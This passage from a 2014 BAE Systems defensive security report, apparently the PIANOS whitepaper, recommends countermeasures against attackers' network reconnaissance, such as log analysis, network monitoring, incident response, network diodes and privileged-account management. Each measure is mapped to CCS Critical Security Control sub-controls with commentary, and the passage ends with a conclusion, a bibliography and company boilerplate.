Network Diode is a technique that ensures a highly assured uni-directional network flow between two differently trusted networks. This is often a hardware device that physically limits the transmission of network traffic in one direction. This is a very strong separation control for protecting critical assets but can limit the utility of those assets as they are unable to directly communicate past the diode. It is not uncommon for critical data stores to be placed behind network diodes and for the users of those databases to have separate virtual or physical desktops for access to the ‘lower’ network.

Network Diode is a technique that extends the following CCS Critical Security Controls:

• Critical Control 11: Limitation and Control of Network Ports, Protocols, and Services

• Critical Control 19: Secure Network Engineering

By employing this control organisations will be able to segregate data, but still maintain access to it. This should decrease the likelihood of successful exfiltration.

Page 38: PIANOS: Protecting Information About Networks The Organisation and It's Systems

36 BAE Systems Applied Intelligence

5.3.3.5 Power Down

Power Down is a tactic that removes the target or intermediate systems from use by the adversary but also has the converse effect of removing them for use by legitimate users. The policies and procedures around this tactic should be well defined and exercised in advance of any serious attack.

Power Down is a tactic that is an extension of the following CCS Critical Security Control:

• Critical Control 18: Incident Response and Management

This specialist tactic highlights the requirement within an incident response program to have established procedures for powering down devices and even whole systems. This should only be done in well-defined circumstances, particularly only after an incident is wholly understood.

5.3.3.6 QoS Limits

Quality of Service (QoS) Limits is a technique that uses network quality of service enforcement in the network devices providing the network to limit bandwidth available for the transfer of large amounts of data, especially to previously unknown locations external to the organisation.

QoS Limits is a technique that extends the following CCS Critical Security Control:

• Critical Control 19: Secure Network Engineering

This can discourage large scale exfiltration of data and provides greater opportunity for a defender to spot such transfers as the limited bandwidth will likely extend the timeframe over which such transfers complete.

5.3.3.7 Sinkhole

A sinkhole (or tarpit) is a technique where a computer system is set up to very slowly respond to all attempts to communicate with it. This has the effect of significantly slowing a scan of the network. It is not uncommon for a single sinkhole to respond to a wide range of unused IP addresses. A sinkhole is also a good place to identify misconfigured or malicious network traffic as there should be no legitimate business reason to attempt to communicate with the Sinkhole.

Sinkhole is a technique that extends the following CCS Critical Security Control:

• Critical Control 19: Secure Network Engineering

This technique may disrupt attackers internal network reconnaissance, increasing the time it takes for various tasks to take place and giving security solutions in place longer to detect the attack.

5.3.3.8 Threat Intelligence

Threat Intelligence is a technique that includes the collection, analysis and sharing of attacker technical and behavioural data from both within and outside of your organisation to determine the threat to your environment. There are now many useful sources of technical threat information available including both industry-led and government-led threat data-sharing schemes. This can provide the opportunity to predict attacks and in some cases spot attacks much earlier.

Threat Intelligence capabilities are not covered by existing CCS controls.

A strong threat intelligence capability should empower organisations to prioritise which areas of network defence are most at risk. By combining an understanding of previous attacks on other organisations with a good knowledge of your own existing network defences it is possible to plan and take appropriate actions to mitigate against similar attacks being successfully mounted against your own organisation.

5.3.3.9 Disconnect

Disconnect is the tactic of disconnecting key systems or segregated networks from lower trust or compromised networks and environments during an attack. This can prevent an attacker from extending their foothold into key systems. This tactic will likely dramatically reduce the utility of the disconnected systems or data to the defender and the policies and procedures around this tactic should be well defined and exercised in advance of any serious attack.

Disconnect capabilities are not covered by existing CCS controls.

This control enables businesses to continue to operate with less impact in the event of an attack.

Page 39: PIANOS: Protecting Information About Networks The Organisation and It's Systems

37 BAE Systems Applied Intelligence

In most cases it is impossible to completely deter the threat actors behind targeted attacks, and therefore organisations should assume that they will be attacked and they will be compromised. Therefore it is critical that measures are put in place to slow the progress of such attacks following successful infiltration, such that detection mechanisms have the longest time possible to detect suspicious activities. Bearing this in mind, we make the following recommendations.

Each recommendation includes a mapping of the relevant CCS Critical Security Controls Sub Controls as well as an associated commentary from BAE Systems on the controls for use by implementers considering deployment and to feed back into the CCS Critical Security Controls development process.

6.1 CRITICAL COUNTERMEASURES

The measures in this section are ‘Critical’. This means that as a minimum, organisations should seek to fully implement the controls recommended in this section.

6.1.1 LOG ANALYSISBy analysing system and network logs continuously, organisations give themselves the best chance of detecting attacks whilst they are taking place. In particular one area which is often overlooked when deploying log analysis solutions is the collection and analysis of host based logs, which enables detection of new tools downloaded by the attacker.

It is critical that organisations deploy the right data collection systems in conjunction with market leading log analysis tools in order to minimise the effort and maximise the rewards of this control.

Log analysis can be increasingly automated and more recent tooling on the market supports this trend. However, there will always be a requirement for skilled analysts both to configure the automated processes and to provide the expert view on the probability that an automated analysis result actually represents a security incident.

Security Information and Event Management tools (SIEM) provide a strong capability for log analysis; providing a near real-time signature or rules-based detection capability to look for known threats in targeted subsets of network monitoring data that are known to contain good indicators of those threats. SIEM is also useful for compliance and reporting.

Log analysis is not primarily a technical capability, although it does require technical tools to enable it. Where the investment in skilled cyber analysts is not economic for an organisation outsourcing this control can provide a cost-effective and high-quality option.

6 RECOMMENDATIONS

Page 40: PIANOS: Protecting Information About Networks The Organisation and It's Systems

38 BAE Systems Applied Intelligence

Sub Control Number

Network Reconnaissance Application Commentary

14.1 The investigation of any network reconnaissance events will require consistent and synchronised logs in order to make any sense to the cyber analyst.

This is a key foundation of the log analysis, network monitoring, incident response and behavioural analysis.

14.6 A common indicator of network reconnaissance activity is an attempt to access multiple resources to which the attacker has not yet acquired the permissions to access.

This is usually a low risk to detection for the attacker as logs of unauthorised access attempts to environment information or repositories are rarely logged and those logs are rarely analysed.

14.11 A reliable indicator of network reconnaissance activity is service creation events across the environment as the attacker attempts to enable network services to gather environment information and to conduct lateral movement.

This is usually a low risk to detection for the attacker as service creation events are not normally logged and those logs are rarely analysed.

14.10 The use of SIEM tooling acts a force multiplier for the network defenders by providing a platform for automation of basic log correlation and signature analysis.

If internal logs are available for analysis by a SIEM then extensive system administration type requests and environment information discovery scans can be identified.

A SIEM is only as good as the Use Cases it is configured to examine, as the data it has to apply the use cases to and as good as the cyber analysts who use the tooling to look at suspicious activity.

The development of a security monitoring function incorporating log analysis and network monitoring capabilities is a wider project than this sub sub-control implies and is not primarily a technology issue.

6.1.1.1 Relevant CCS Critical Security Control Sub Controls

6.1.2 INCIDENT RESPONSEHaving a strong incident response capability is critical to network defence. Historically solutions have relied on prevention of attacks and whilst this remains key, new thinking is required. Persistent attackers are likely to infiltrate target networks given enough time and as such companies should ensure that they either have a good incident response capability setup in house, or identify a partner organisation to provide incident response services in the event of an attack.

By setting up the capability, or relationship in advance of an attack, organisations are best equipped to identify the extent of a compromise as quickly as possible which can reduce the impact of compromises. If this measure is implemented poorly or not at all the time between identification of the incident and remediation will be increased, which may lead to further data loss and potentially more expensive incident response activities.

A key part of successfully establishing an incident response capability is testing the incident response team with guided table-top cyber management exercises and adversarial technical exercises. This improves the ‘muscle memory’ of the organisation and reduces the speed of response and decision making during real cyber crises.

CCS Critical Security Sub Controls relevant to Log AnalysisTable 13

Page 41: PIANOS: Protecting Information About Networks The Organisation and It's Systems

39 BAE Systems Applied Intelligence

CCS Critical Security Sub Controls relevant to Incident ResponseTable 14

6.1.2.1 Relevant CCS Critical Security Control Sub Controls

Sub Control Number

Network Reconnaissance Application Commentary

5.13 The ability to capture and recover any additional tools downloaded by an attacker can allow for analysis of both where the tools have come from and potentially what targets within the organisation they were used on.

The close integration between IT and security in order to ensure tools can be captured and recovered discretely is a challenge, especially in large distributed environments. It is impossible to introduce such a capability both discretely and retroactively during the course of a targeted account.

18.1 Once network reconnaissance has been identified then there is an opportunity to reject the attacker before they have established a major foothold in the environment.

Speed of response is a key characteristic during the network reconnaissance stage of the kill chain.

The speed, accuracy and reliability of incident response, especially across large distributed environments relies on non-specialist first-responders and technology managers. By documenting the procedures they must follow the opportunity for mistakes and dangerous ad-hoc improvisation is reduced.

18.3 Once network reconnaissance has been identified then there is an opportunity to reject the attacker before they have established a major foothold in the environment.

Speed of response is a key characteristic during the network reconnaissance stage of the kill chain.

Key incident response decision-makers must be identified and trained. Cyber specialists are rarely in a position to make the business decisions required during a targeted attack and business leaders are rarely well informed enough about the cyber security domain to easily be able to weigh up their options quickly and rationally.

18.7 Once network reconnaissance has been identified then there is an opportunity to reject the attacker before they have established a major foothold in the environment.

Speed of response is a key characteristic during the network reconnaissance stage of the kill chain.

Incident response procedures must be exercised and tested regularly. Having a documented set of procedure is of little value if the decision-making process is ad-hoc and hesitant due to lack of experience.

Page 42: PIANOS: Protecting Information About Networks The Organisation and It's Systems

40 BAE Systems Applied Intelligence

6.1.3 NETWORK MONITORINGIn order for the Incident Response capability outlined in section 6.1.2 is effective it is critical that high quality logs are kept so that incident responders are able to piece together events from the past. Similarly for incidents to be identified alerts relating to the detection of security events by intrusion detection systems, intrusion prevention systems and anti-virus tools must be collected, reviewed and acted upon.

Specifically we recommend that:

• Coverage of devices from which logs or alerts are collected should be as wide as possible.

• Log larger amounts of data in the raw log or alert format and only normalise data at the time of analysis and when required to meet known network monitoring security use cases. This ensures that a much wider range of data is available for investigation by the Incident Response Capability.

• Where possible logging of sources is done for longer than the default period; storage of data is now cheap and ideally logs should be kept for 6 months.

• Data logged should be saved to segregated networks, and should be backed up and tested to ensure all logging policies are correctly implemented.

• As a minimum, logs of the following sources should be kept:

o HTTP (usually proxy) logs o E-mail (usually exchange) logs o DNS logs o DHCP o VPN

• For all sources logged, it is important that both successful and unsuccessful connections are logged.

• Where possible, host based logs should also be recorded, as this empowers network defenders to tie network and host activity together.

Page 43: PIANOS: Protecting Information About Networks The Organisation and It's Systems

41 BAE Systems Applied Intelligence

Sub Control Number

Network Reconnaissance Application

Commentary

5.11 The ability to identify any additional tools as they are being downloaded by an attacker can provide critical advance notice of network reconnaissance activities.

Use of encryption and custom tools can render signature-based network malware detection tools useless.

5.12 This is a control worth investing in but cannot be the primary method of defence.

Monitoring at the boundary is the most useful and efficient tactic when looking at the whole kill chain but needs to be supplemented with internal monitoring and sensors when considering network reconnaissance.

13.2 By monitoring inbound and outbound activity it may be possible to detect command and control channels or data exfiltration events associated with active network reconnaissance.

Monitoring at the boundary is the most useful and efficient tactic when looking at the whole kill chain but needs to be supplemented with internal monitoring and sensors when considering network reconnaissance.

13.4 By monitoring inbound and outbound activity it may be possible to detect command and control channels or data exfiltration events associated with active network reconnaissance.

Monitoring at the boundary is the most useful and efficient tactic when looking at the whole kill chain but needs to be supplemented with internal monitoring and sensors when considering network reconnaissance.

13.5 By blocking obvious network reconnaissance activities the network reconnaissance phase of the attackers kill chain can be extended which provides greater opportunities to detect and respond to the attack.

Intrusion Prevention Systems (IPS) would need to be deployed internally around key systems and repositories of environment information in order to be effective.

There is always a risk in deploying automated blocking tools that an attacker may use them against you in order to achieve business disruption goals.

13.13 By monitoring inbound and outbound activity it may be possible to detect command and control channels or data exfiltration events associated with active network reconnaissance.

Monitoring at the boundary is the most useful and efficient tactic when looking at the whole kill chain but needs to be supplemented with internal monitoring and sensors when considering network reconnaissance.

13.14 By monitoring inbound and outbound activity it may be possible to detect command and control channels or data exfiltration events associated with active network reconnaissance.

Monitoring at the boundary is the most useful and efficient tactic when looking at the whole kill chain but needs to be supplemented with internal monitoring and sensors when considering network reconnaissance.

6.1.3.1 Relevant CCS Critical Security Control Sub Controls

CCS Critical Security Sub Controls relevant to Network MonitoringTable 15

Page 44: PIANOS: Protecting Information About Networks The Organisation and It's Systems

42 BAE Systems Applied Intelligence

6.1.4 THREAT INTELLIGENCEThreat intelligence provides the opportunity for organisations to get ahead of the threats they face. By engaging with threat intelligence sharing forums, conducting open source intelligence gathering operations and subscribing to free and commercial technical threat intelligence feeds it is possible to gather indicators of compromise (IoC).

IoC describe the technical characteristics of threats active on other networks and systems that can be translated to the organisation’s own monitoring systems in order to identify targeted attacks within the organisation’s own estate that would otherwise go unnoticed. Members of threat sharing forums such as the CPNI sponsored sector-focused Information Exchanges or the Cyber Information Sharing Partnership (CISP)12 often share patterns of network reconnaissance as IoC.

Threat Intelligence teams have the visibility of the external threat and the internal business priorities such that they can generate use cases for both network monitoring and behavioural analysis.

We recommend that organisations either establish a dedicated internal threat intelligence function or engage with specialist providers of threat intelligence services to provide the filtered and contextualised threat intelligence necessary to identify active threats to the business.

6.1.4.1 Relevant CCS Critical Security Control Sub Controls

There are no directly relevant CCS Critical Security Control Sub Controls for Threat Intelligence.

Threat Intelligence is a new discipline in Cyber Security but is no longer a cutting edge activity and has become business as usual in early adopter organisations. However, the discipline is not mature and there are few industry standards for the capability beyond some technical information sharing formats.

Establishing a Threat Intelligence capability goes way beyond technical analysis, though that is a key function. Many organisations are now recruiting ex-military or ex-law enforcement intelligence analysts and are cross-training them into cyber security as they bring a wealth of knowledge regarding managing the intelligence cycle which can easily trip up a technical threat investigator without wider intelligence experience.

6.2 IDEAL COUNTERMEASURES

The measures in this section are ‘Ideal’ and in addition to those outlined in Section 6.1 should be implemented in order to ensure defences are adequate. However we recognise that these measures either have a high cost associated with them, or may be inconvenient to deploy as they may adversely affect business efficiency.

6.2.1 SOFTWARE INVENTORYThis measure is the most effective of the ‘DENY’ capabilities, preventing malware from infecting systems and malware which has infected systems from being successful. Most actions conducted by attackers following infiltration have a pre-requisite that they have downloaded and executed an additional tool. In most cases keeping a software inventory will mitigate the risks of this.

In order to extend this control, organisations should consider implementing policies which restrict where software is run from. Many malware families rely on running from the users’ home area.

We recognise that this control is one of the most difficult to implement, whilst maintaining effective business operations, and as such it is considered ‘ideal’ rather than critical.

It is particularly important that organisations employing software inventory controls protect their software inventory. Any technology employed as part of this control should be integrity checked regularly – ensuring that the list of authorised software has not been edited unexpectedly, and that the software which is authorised has not been tampered with. Access to the software inventory should be restricted, such that only users with a business case are able to access it.

Page 45: PIANOS: Protecting Information About Networks The Organisation and It's Systems

43 BAE Systems Applied Intelligence

Sub Control Number

Network Reconnaissance Application Commentary

2.1 By denying access to unused common administration tools it is possible to severely restrict the capability of an attacker to conduct network reconnaissance.

White lists are undoubtedly inconvenient and costly to administer but are a powerful defensive techniques that significantly raises the bar for an attacker.

2.2 The capability to identify new and modified programs across the estate will enable detection of the download of additional tools to support network reconnaissance allowing the organisation to respond earlier.

Identify and maintaining an enterprise-wide list of authorised software is a large activity with a significant cost associated with it.

2.4 The capability to identify modified programs across the estate will enable detection of the download of additional tools to support network reconnaissance allowing the organisation to respond earlier.

Software inventory is a key foundation both of vulnerability & patch management as well as application white listing. It also provides a basis for software licence management and compliance.

2.6 The capability to identify modified programs across the estate will enable detection of the download of additional tools to support network reconnaissance allowing the organisation to respond earlier.

Software inventory is a key foundation both of vulnerability & patch management as well as application white listing. It also provides a basis for software licence management and compliance.

2.7 The increasing use of mobile devices and the increasing power of mobile devices now require they be treated at least as well as workstations with regard to cyber security.

The growth in sophisticated mobile malware targeting financial fraud increases the risk that mobile devices used by your staff and your partners have been recruited into a mobile botnet and that access is available on the black market.

6.2.1.1 Relevant CCS Critical Security Control Sub Controls

CCS Critical Security Sub Controls relevant to Network MonitoringTable 16

Page 46: PIANOS: Protecting Information About Networks The Organisation and It's Systems

44 BAE Systems Applied Intelligence

6.2.2 NETWORK DIODEIn order to reduce the risk of high value data being lost, organisations should use Network diode technology to segregate valuable data from operational networks. If set up properly, network diodes can make lateral movement difficult, as well as preventing access to certain data.

Implementation of Network diodes should be considered as part of a wider thought process about where the data on enterprise networks exist, whether there is a business requirement for it residing in that location and which users require access to the data.

6.2.2.1 Relevant CCS Critical Security Control Sub Controls

There are no directly relevant CCS Critical Security Control Sub Controls for Network Diodes.

Network diodes are very strong and very reliable network flow control devices. Properly deployed an attacker will not be able to traverse the network diode and collect environment information from the ‘high’ side of the device. Network diodes need little maintenance once deployed and depending on the complexity of the deployment may not need extensive configuration.

However, Network Diodes are inflexible and hugely inconvenient for IT staff used to bi-directional network communications, often leading to complicated and self-defeating bypass mechanisms. Network diodes require a strong defined security architecture that is aware of the operational communications needs of the business environment.

6.2.3 BEHAVIOURAL ANALYSISBehavioural analysis is essentially an extension of the log analysis (recommendation made in 6.1.1) and ideally organisations should implement behavioural analysis in addition to regular log analysis. By collecting large volumes of data on typical user and system behaviour in organisations and keeping statistics on average transactions made by users, organisations can apply behavioural analytics and big data techniques to detect subtle cyber threats.

The key enabling characteristics of behavioural analytics are that it highlights behaviours that look similar to expected threats, it provides probable behavioural matches with a the underlying characteristics of threat behaviours, such that an attacker attempting to evade detection is forced to make fundamental changes to their modus operandi. Critically behavioural analytics detects general classes of threats and can investigate behaviours that extend over wider ranges of time such as a careful targeted attack.

In particular Behavioural Analysis can be used to detect suspicious behaviours such as the concentration of sys-admin style tools on a regular user account, the download of additional tools and the use of communication channels with previously unknown command and control (C2) servers.

However, in order to successfully analyse the behaviours on the business’s networks and systems a much broader range of logs and alerts must be kept and processed.

We recognise that for small organisations (typically less than 500 seats), the costs associated with building/maintaining behavioural analysis solutions can be too high. This cost can sometimes be overcome through outsourcing of this capability. In the near future we expect the cost of behavioural analysis solutions to decrease, and the maturity of these solutions to increase, moving this control from ‘Ideal’ to ‘Critical’.

Page 47: PIANOS: Protecting Information About Networks The Organisation and It's Systems

45 BAE Systems Applied Intelligence

6.2.3.1 Relevant CCS Critical Security Control Sub Controls

Sub Control Number

Network Reconnaissance Application Commentary

5.1 Identifying unusual behaviour on endpoint devices such as network reconnaissance style activity requires data from continuous monitoring.

Behavioural analytics requires significant amount of data such as system process activity.

5.10 Network Reconnaissance is rarely obviously malicious activity unless it is analysed in the business context including who initiated the activity, which systems were targeted and what other similar events have been occurring.

Anomaly detection is a useful technique but in our experience threat-driven behavioural analytics based on an analysis of threat behaviours rather than the identification unexplained anomalous behaviour is more reliable and produces less false-positive.

5.14 Identifying network reconnaissance from network traffic activity requires data from continuous monitoring.

Behavioural analytics requires significant amount of data such as network activity.

14.7 Regular analysis of logs for behavioural analysis is necessary as some behavioural indicators for network reconnaissance will only become apparent over time.

Biweekly analysis is no longer appropriate given the increased level of the threat. A 24 hour batch processing cycle should be considered the minimum window for log processing.

16.12 Understanding what a normal users behavioural profile is allows the divergent profile of a compromised identity conducting network reconnaissance to stand out from its peers.

The user profile should include patterns of network behaviour such as web browsing and intranet application usage and technical tool usage.

CCS Critical Security Sub Controls relevant to Behavioural AnalysisTable 17

Page 48: PIANOS: Protecting Information About Networks The Organisation and It's Systems

46 BAE Systems Applied Intelligence

Sub Control Number

Network Reconnaissance Application Commentary

16.3 Attempts to move laterally using credentials discovered at the point of infiltration can cause account lock outs and generate log-in failure logs and alerts.

A targeted attacker will not get caught like this very often or for very long. However, the presence of this sort of rate limiter for lateral movement will extend the network reconnaissance phase.

16.5 By reducing the number of logged in but inactive accounts there will be less obvious targets visible to attackers attempting to move laterally.

This also ensures that analysis of active accounts during an investigation can focus on truly active accounts and won’t include inactive but logged-on accounts, reducing the investigative burden.

16.6 By reducing the number of long-lived dormant accounts there are less targets for attackers to attempt to compromise.

Creating invitingly-named and irresistibly authorised ‘canary’ dormant accounts that are heavily monitored can provide an early warning of attempted lateral access and network reconnaissance.

6.2.4 ACCOUNT MONITORINGAs part of the Monitoring family of controls, Account Monitoring offers an increased level of control over user accounts. Organisations should employ this control to detect malicious insiders and attacker’s attempting to impersonate legitimate users. This measure mitigates risks which could develop as a result of other weak areas such as dormant or inactive accounts which an attacker could exploit, and detects where an attacker has been able to escalate privileges. It also provides an extra layer of security above an organisation’s vetting, providing increased checks and balances on users trusted with privileged accounts.

Account Monitoring can be linked to other processes, such as Human Resources, for the disabling of employee or contractor accounts immediately upon termination. This control also provides the facility of strict account expiration, password policies, forced log offs and lockouts. Furthermore, the control offers the automation of reporting to increase the efficiency of account review and analysis to ensure accounts not associated with a business process or owner are disabled.

6.2.4.1 Relevant CCS Critical Security Control Sub Controls

CCS Critical Security Sub Controls relevant to Account MonitoringTable 18

Page 49: PIANOS: Protecting Information About Networks The Organisation and It's Systems

47 BAE Systems Applied Intelligence

CCS Critical Security Sub Controls relevant to Privileged User Access ManagementTable 19

6.2.5 PRIVILEGED USER MANAGEMENTOne of the reconnaissance objectives outlined in section 3, was elevate privileges to collect environment information; in order to make this objective as difficult as possible, it is critical to implement good user management policies and systems. Specifically we believe that the risk of privilege escalation being successful for attackers can be significantly reduced through a combination of:

• Ensuring all high-value administrative accounts are used by exception only, administrators should use non-privileged accounts by default.

• Using a ‘break-glass’ procedure to allow administrators to request and take access to high-value administrative accounts in emergencies but ensure that fact is recorded, that the record is correlated with a valid business emergency and that the access to the account is reset following use.

• Increasing the basic security policies for privileged users, such as required password complexity, for further details on password management see the NIST guide.13

• Only giving administrator privileges to users who require it.

• Review of the groups to which users belong and ensuring not everyone is in the same group.

• Ensuring that the local administrator account is not the same for all accounts across the estate.

6.2.5.1 Relevant CCS Critical Security Control Sub Controls

Sub Control Number

Network Reconnaissance Application Commentary

3.3 Limiting the number of administrative users can, when combined with other controls such as application whitelisting, force an attacker to undertake lateral movement or escalation of privileges to run network reconnaissance programs, thus putting them at greater risk of detection by network defenders.

Control of administrative privileges can, anecdotally, increase reliability and reduce support costs due to less variability in system configuration across the estate.

12.1 Restricting the use of administrative accounts only to authorised administrative activities and auditing those activities when they occur make it more likely that the use of valid administrative privileges and tools for network reconnaissance can be identified for falling outside of an authorised activity.

This requires rigour such as formal change control windows and post event reconciliation of audit records between change requests and system logs.

12.2 General good hygiene around managing administrative accounts and privileges will reduce the easier opportunities for attackers to conduct network reconnaissance.

An up-to date inventory of valid administrative accounts can be used as a source of enrichment for log analysis and behavioural analytics.

12.6 General good hygiene around managing administrative accounts and privileges will reduce the easier opportunities for attackers to conduct network reconnaissance.

Service accounts will often exhibit ‘machine-like’ behaviours and a change in behaviour to resemble human activity can be an indicator of an account hijacked for network reconnaissance.

(Continued overleaf)

Page 50: PIANOS: Protecting Information About Networks The Organisation and It's Systems

48 BAE Systems Applied Intelligence

12.7 Recovery of password lists, either from notes kept on administrative workstations or directly from password databases and user directories is a key network reconnaissance activity, this is key environmental information needed by an attacker to complete lateral access activities.

Keeping a recoverable list of administrative accounts and passwords for emergency break-glass access by authorised administrators is a good practice that supports available environments. However, the use of this data to an attacker is such that all of these lists should be known and strong security controls should be applied to them.

12.8 General good hygiene around managing administrative accounts and privileges will reduce the easier opportunities for attackers to conduct network reconnaissance.

Control of administrative privileges can, anecdotally, increase reliability and reduce support costs due to less variability in system configuration across the estate.

12.9 General good hygiene around managing administrative accounts and privileges will reduce the easier opportunities for attackers to conduct network reconnaissance.

Control of administrative privileges can, anecdotally, increase reliability and reduce support costs due to less variability in system configuration across the estate.

Sub Control Number

Network Reconnaissance Application Commentary

Page 51: PIANOS: Protecting Information About Networks The Organisation and It's Systems

49 BAE Systems Applied Intelligence

While it may not be possible to prevent targeted attacks much can be done to improve defences and responses to the threat.

Network reconnaissance is a critical time for the attacker; it is when they most vulnerable with a limited foothold in the environment and also when they are most visible as they scan for their targets across the environment before they build a covert position. By slowing the network reconnaissance activity we increase our opportunity to detect its effects and respond before significant damage occurs.

Fully implementing the four critical controls identified in section 6.1 of this report will significantly increase your ability to detect network reconnaissance and implementing select ideal controls identified in section 6.2 of this report will slow down the attacker’s network reconnaissance activities while you watch for them.

7.1 KEY TAKEAWAY

Do not under-estimate the value of the technical information describing your environment and the business information describing your organisation to your attacker (as described in Section 2.2). Protect this information at least as well you protect your core business assets.

7 CONCLUSION

Page 52: PIANOS: Protecting Information About Networks The Organisation and It's Systems

50 BAE Systems Applied Intelligence

[1] “http://www.nytimes.com/2013/01/31/technology/chinese-hackers-infiltrate-new-york-times-computers.html?pagewanted=all&_r=0,” [Online].

[2] ““APT1: Exposing One of China’s Cyber Espionage Units”, Mandiant (http://www.mandiant.com/),” [Online].

[3] E. M. Hutchins, M. J. Cloppert and R. M. Amin, “Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains,” Lockheed Martin Corporation.

[4] “ http://news.sky.com/story/1082264/chinese-hacking-suspects-back-in-business,” [Online].

[5] “http://rf.harris.com/media/SierraII_tcm26-9224.pdf,” [Online].

[6] “http://www.enteo.com/,” [Online].

[7] “http://foofus.net/goons/fizzgig/pwdump/,” [Online].

[8] “http://blogs.rsa.com/lions-at-the-watering-hole-the-voho-affair/,” [Online].

[9] “http://www.teamviewer.com/en/index.aspx,” [Online].

[10] “http://www.counciloncybersecurity.org/practice-areas/technology,” [Online].

[11] “http://www.dtic.mil/doctrine/new_pubs/jp3_13.pdf,” [Online].

[12] “https://www.cisp.org.uk” [Online].

[13] “ http://csrc.nist.gov/publications/drafts/800-118/draft-sp800-118.pdf,” [Online].

8 BIBLIOGRAPHY

Page 53: PIANOS: Protecting Information About Networks The Organisation and It's Systems

51 BAE Systems Applied Intelligence

Page 54: PIANOS: Protecting Information About Networks The Organisation and It's Systems

We deliver solutions which help our clients to protect and enhance their critical assets in the intelligence age. Our intelligent protection solutions combine large-scale data exploitation, ‘intelligence-grade’ security and complex services and solutions integration.

We operate in four key domains of expertise: cyber security, financial crime, communications intelligence and digital transformation.

Leading enterprises and government departments use our solutions to protect and enhance their physical infrastructure, mission-critical systems, valuable intellectual property, corporate information, reputation and customer relationships, competitive advantage and financial success.

We are part of BAE Systems, a global defence, aerospace and security company with approximately 90,000 employees. BAE Systems delivers a full range of products and services for air, land and naval forces, as well as advanced electronics, security, information technology solutions and customer support services.

For more information contact:

BAE Systems Applied Intelligence Surrey Research Park Guildford Surrey GU2 7RQ United Kingdom

T: +44 (0) 1483 816000 E: [email protected] W: www.baesystems.com/ai

ABOUT US

Copyright © BAE Systems plc 2014. All rights reserved.

BAE SYSTEMS, the BAE SYSTEMS Logo and the product names referenced herein are trademarks of BAE Systems plc. BAE Systems Applied Intelligence Limited registered in England & Wales (No.1337451) with its registered office at Surrey Research Park, Guildford, England, GU2 7RQ. No part of this document may be copied, reproduced, adapted or redistributed in any form or by any means without the express prior written consent of BAE Systems Applied Intelligence.

This material is provided for general information purposes only. You should make your own judgement as regards use of this material and seek independent professional advice on your particular circumstances. Neither the publisher, nor the author, nor any contributors assume any liability to anyone for any loss or damage caused by any error or omission in the work, whether such error or omission is the result of negligence or any other cause.


Recommended